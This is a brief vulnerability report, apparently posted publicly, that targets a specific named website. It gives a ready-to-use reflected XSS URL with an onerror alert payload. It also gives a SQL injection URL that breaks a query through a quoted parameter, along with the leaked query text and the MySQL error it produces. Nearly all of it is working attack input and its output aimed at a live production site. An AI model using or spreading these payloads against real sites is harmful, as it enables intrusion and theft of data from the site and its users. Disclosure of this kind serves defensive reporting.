XSS http://www.contributieuropa.com/v3/store/messaggio.asp?message=%3Cvideo%3E%3Csource%20onerror=%22alert(%27xss%27)%22%3E SQL query from error SELECT facilities.id AS id, excerpt, status, expire_Date, name, des-c-r-i-p-tion, region_id,doclink,dotfin, difficulty, title FROM facilities, facilities_regions, regions WHERE facilities.id=facilities_regions.facility_id AND facilities_regions.region_id=regions.id AND facilities.id={id} SQL Injection http://www.contributieuropa.com/v3/store/veditutti.asp?regione=09&activities=1&activities=9&activities=2&activities=3&activities=%278&activities=5&activities=4&activities=6&activities=7 Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [MySQL][ODBC 5.3(a) Driver][mysqld-5.6.24-log]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''8, 5, 4, 6, 7) ) GROUP BY facilities.id ORDER BY id d...